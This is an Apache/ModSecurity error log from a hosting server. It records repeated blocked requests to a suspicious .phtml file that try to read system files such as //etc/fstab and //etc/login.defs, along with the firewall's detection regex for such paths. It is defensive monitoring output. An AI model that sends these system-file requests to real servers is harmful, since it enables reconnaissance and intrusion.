[Thu Mar 19 18:57:06.993368 2026] [:error] [pid 7545:tid 140411641214720] [client 57.141.18.31:54950] [client 57.141.18.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/grep_colors"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxMn8B84UptSoTJtY54AAAAYw"]
[Thu Mar 19 18:57:07.272123 2026] [:error] [pid 19655:tid 140411582465792] [client 57.141.18.30:54954] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxM01ujooLWdUDGy4AAwAAAFM"]
[Thu Mar 19 18:57:08.129768 2026] [proxy_fcgi:error] [pid 7235:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52302] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 18:57:09.359471 2026] [:error] [pid 17653:tid 140411683178240] [client 57.141.18.32:54980] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/filesystems"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxNcdf6f5d65gmYZSk0AAAAsc"]
[Thu Mar 19 18:57:09.971593 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.12:55014] [client 57.141.18.12] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/my.cnf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxNeoXxyEfFpUF8f84rwAAAUQ"]
[Thu Mar 19 18:57:10.613401 2026] [:error] [pid 15826:tid 140411632822016] [client 57.141.18.114:55032] [client 57.141.18.114] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/dracut.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxNuoXxyEfFpUF8f84swAAAU0"]
[Thu Mar 19 18:57:11.063162 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.39:55046] [client 57.141.18.39] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/hostname"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxN-oXxyEfFpUF8f84tQAAAUQ"]
[Thu Mar 19 18:57:11.180205 2026] [:error] [pid 14269:tid 140411565680384] [client 57.141.18.20:55048] [client 57.141.18.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxNwbLMZ6AikZjR9WG4gAAABU"]
[Thu Mar 19 18:57:11.569122 2026] [:error] [pid 7893:tid 140411565680384] [client 57.141.18.43:55064] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php-fpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxNxCii7xarUs8iHYWZgAAAhU"]
[Thu Mar 19 18:57:11.844049 2026] [:error] [pid 7235:tid 140411582465792] [client 57.141.18.72:55068] [client 57.141.18.72] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxN_qxLDW4GITHUkSTJwAAARM"]
[Thu Mar 19 18:57:12.486417 2026] [:error] [pid 15826:tid 140411708356352] [client 57.141.18.121:55082] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libaudit.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxOOoXxyEfFpUF8f84uAAAAUQ"]
[Thu Mar 19 18:57:12.825475 2026] [:error] [pid 15826:tid 140411607643904] [client 57.141.18.30:55090] [client 57.141.18.30] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/locales.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxOOoXxyEfFpUF8f84ugAAAVA"]
[Thu Mar 19 18:57:13.300374 2026] [:error] [pid 17653:tid 140411565680384] [client 57.141.18.77:55098] [client 57.141.18.77] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/aliases.db"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxOcdf6f5d65gmYZSk0QAAAtU"]
[Thu Mar 19 18:57:13.357196 2026] [:error] [pid 7545:tid 140411741927168] [client 57.141.18.121:55100] [client 57.141.18.121] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxOX8B84UptSoTJtY54QAAAYA"]
[Thu Mar 19 18:57:13.620017 2026] [:error] [pid 15826:tid 140411725141760] [client 57.141.18.5:55104] [client 57.141.18.5] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/xinetd.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxOeoXxyEfFpUF8f84vAAAAUI"]
[Thu Mar 19 18:57:15.065670 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.7:55108] [client 57.141.18.7] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxOeoXxyEfFpUF8f84vgAAAUU"]
[Thu Mar 19 18:57:15.610786 2026] [:error] [pid 20435:tid 140411557287680] [client 57.141.18.110:55132] [client 57.141.18.110] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxO5JaM1-0uhhUQJND-gAAAJY"]
[Thu Mar 19 18:57:15.956682 2026] [:error] [pid 21219:tid 140411674785536] [client 57.141.18.47:55140] [client 57.141.18.47] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/php"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxO_XLqtnMIWvjpaJJnQAAAog"]
[Thu Mar 19 18:57:16.535836 2026] [:error] [pid 21219:tid 140411708356352] [client 57.141.18.64:55170] [client 57.141.18.64] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/login.defs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPPXLqtnMIWvjpaJJngAAAoQ"]
[Thu Mar 19 18:57:16.967491 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.26:55174] [client 57.141.18.26] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/nsswitch.conf.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPAkwaGbbGflqUZD2sAAAAME"]
[Thu Mar 19 18:57:17.539471 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.32:55184] [client 57.141.18.32] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/fstab"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPQkwaGbbGflqUZD2sQAAAME"]
[Thu Mar 19 18:57:17.736906 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.96:55188] [client 57.141.18.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/rc0.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPQkwaGbbGflqUZD2sgAAANg"]
[Thu Mar 19 18:57:17.839562 2026] [:error] [pid 17887:tid 140411733534464] [client 57.141.18.113:55190] [client 57.141.18.113] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/rc.local"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPQkwaGbbGflqUZD2swAAAME"]
[Thu Mar 19 18:57:18.283952 2026] [:error] [pid 21219:tid 140411616036608] [client 57.141.18.43:55206] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/libuser.conf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPvXLqtnMIWvjpaJJoAAAAo8"]
[Thu Mar 19 18:57:19.177018 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.43:55222] [client 57.141.18.43] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/sysctl.conf.rpmnew"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxPwkwaGbbGflqUZD2tQAAANg"]
[Thu Mar 19 18:57:21.699340 2026] [:error] [pid 19655:tid 140411725141760] [client 57.141.18.116:55264] [client 57.141.18.116] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxQU1ujooLWdUDGy4ABgAAAEI"]
[Thu Mar 19 18:57:21.699667 2026] [core:alert] [pid 21563:tid 140411658000128] [client 57.141.18.117:55266] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 18:57:21.700002 2026] [:error] [pid 15826:tid 140411699963648] [client 57.141.18.25:55256] [client 57.141.18.25] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //etc/yum.conf.bkp-21-10-22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxQOoXxyEfFpUF8f84xwAAAUU"]
[Thu Mar 19 18:57:21.762205 2026] [:error] [pid 17887:tid 140411540502272] [client 57.141.18.68:55278] [client 57.141.18.68] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxQQkwaGbbGflqUZD2tgAAANg"]
[Thu Mar 19 18:57:22.459216 2026] [:error] [pid 21219:tid 140411565680384] [client 57.141.18.62:55290] [client 57.141.18.62] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/shop/obstructive/maresnest011440631446.phtml"] [unique_id "abxxQvXLqtnMIWvjpaJJowAAApU"]
